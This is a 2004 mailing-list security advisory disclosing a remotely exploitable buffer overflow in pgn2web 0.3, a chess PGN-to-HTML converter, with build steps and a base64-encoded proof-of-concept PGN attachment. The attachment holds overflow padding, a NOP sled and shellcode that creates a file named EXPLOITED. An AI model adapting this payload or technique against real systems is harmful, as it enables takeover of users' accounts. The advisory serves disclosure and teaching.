Mailing-List: contact securesoftware-help@list.cr.yp.to; run by ezmlm Delivered-To: mailing list securesoftware@list.cr.yp.to Received: (qmail 41299 invoked by uid 1017); 15 Dec 2004 08:25:23 -0000 Date: 15 Dec 2004 08:25:23 -0000 Message-ID: <20041215082523.41298.qmail@cr.yp.to> Mail-Followup-To: securesoftware@list.cr.yp.to, whoggarth@users.sourceforge.net Automatic-Legal-Notices: See http://cr.yp.to/mailcopyright.html. From: "D. J. Bernstein" To: securesoftware@list.cr.yp.to, whoggarth@users.sourceforge.net Subject: [remote] [control] pgn2web 0.3 process_moves overflows token buffer Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="LQksG6bCIzRHxTLp" Content-Disposition: inline --LQksG6bCIzRHxTLp Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Tom Palarz and Kris Kubicki, two students in my Fall 2004 UNIX Security Holes course, have discovered a remotely exploitable security hole in pgn2web, a converter from PGN-format chess games to web pages. I'm publishing this notice, but all the discovery credits should be assigned to Palarz and Kubicki. You are at risk if you take a PGN file from an email message (or a web page or any other source that could be controlled by an attacker) and feed that document through pgn2web. Whoever provides the PGN file then has complete control over your account: he can read and modify your files, watch the programs you're running, etc. The pgn2web documentation does not tell users to avoid taking input from the network. In fact, one can easily find web pages offering chess games in PGN format for public use. Proof of concept: On an x86 computer running FreeBSD 4.10, type wget http://umn.dl.sourceforge.net/sourceforge/pgn2web/pgn2web-0.3.tar.gz gunzip < pgn2web-0.3.tar.gz | tar -xf - cd pgn2web gcc -Wall -o pgn2web pgn2web.c -DINSTALL_PATH='"./"' to download and compile the pgn2web program, version 0.3 (current). Then save the file 45.pgn attached to this message, and type ./pgn2web 45.pgn 45.html with the unauthorized result that a file named EXPLOITED is created in the current directory. Here's the bug: In pgn2web.c, process_moves() uses fscanf() to read any number of bytes into a 256-byte token array. ---D. J. Bernstein, Associate Professor, Department of Mathematics, Statistics, and Computer Science, University of Illinois at Chicago --LQksG6bCIzRHxTLp Content-Type: application/x-chess-pgn Content-Disposition: attachment; filename="45.pgn" Content-Transfer-Encoding: base64 RGFuaXNoIENoYW1waW9uc2hpcHMgMTk2MSwgTnlrb2ViaW5nIEZhbHN0ZXIKCiAgICAgICAg ICAgICAgICAgICAgICAgIDEgMiAzIDQgNSA2IDcgOCA5IDAgMSAyCl9fX19fX19fX19fX19f X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fCgogMS4gUGVkZXJzZW4s RWpnaWwgICAgICBYID0gMSAwIDEgMSAxIDEgMSAxID0gMSAgIDkKIDIuIEFuZGVyc2VuLEJv ZXJnZSAgICAgPSBYID0gMSAxIDEgPSAxIDEgMCAxIDEgICA4LjUKIDMuIEJsb20sS2FqICAg ICAgICAgICAgMCA9IFggPSA9IDEgPSA9ID0gMSAxID0gICA2LjUKIDQuIEhhbWFubixTdmVu ZCAgICAgICAgMSAwID0gWCA9IDEgPSAwIDAgMSAxID0gICA2CiA1LiBGcm9tLFNpZ2ZyZWQg ICAgICAgIDAgMCA9ID0gWCAwIDAgMSAxID0gMSAxICAgNS41CiA2LiBIYW5zZW4sVmljdG9y IEp1dWwgIDAgMCAwIDAgMSBYIDEgPSA9IDEgMSA9ICAgNS41CiA3LiBQZXRlcnNlbixTZWpl ciBIb2xtIDAgPSA9ID0gMSAwIFggMCAxIDEgMCA9ICAgNQogOC4gTmllbHNlbixIYXJ0dmln ICAgICAwIDAgPSAxIDAgPSAxIFggMCAwIDEgMSAgIDUKIDkuIEtvZWx2aWcsQmVudCAgICAg ICAgMCAwID0gMSAwID0gMCAxIFggMCAxID0gICA0LjUKMTAuIE1vZWxsZXIsUGVyICAgICAg ICAgMCAxIDAgMCA9IDAgMCAxIDEgWCAwID0gICA0CjExLiBIYWFocixUaCAgICAgICAgICAg ID0gMCAwIDAgMCAwIDEgMCAwIDEgWCAxICAgMy41CjEyLiBOaWVsc2VuLEF4ZWwgICAgICAg IDAgMCA9ID0gMCA9ID0gMCA9ID0gMCBYICAgMwpfX19fX19fX19fX19fX19fX19fX19fX19f X19fX19fX19fX19fX19fX19fX19fX19fX19fXwoKW0V2ZW50ICI/Il0KW1NpdGUgIkRFTi1j aCwgTnlrb2ViaW5nIEZhbHN0ZXIiXQpbRGF0ZSAiMTk2MS4/Py4/PyJdCltSb3VuZCAiPyJd CltXaGl0ZSAiUGV0ZXJzZW4sIFNlamVyIEhvbG0iXQpbQmxhY2sgIkhhbnNlbiwgVmljdG9y IEp1dWwiXQpbUmVzdWx0ICIwLTEiXQpbRUNPICJEMTkiXQoKQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUEA0AUIANAFCEjy v79I8r+/4E4QKERERET08b+/8PG/v0ZGRkZGRkZGAOAFCJCQkJCQkJCQkJCQkJCQkJCQkJCQ kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ kJCQkJCQkJCQkJCQkJCQkJCQkJDrJVkxwEBAQMHgB1C4EjRWAsHoGMHgCFBRMcCwBVDNgDHA UEBQzYDo1v///0VYUExPSVRFRA== --LQksG6bCIzRHxTLp--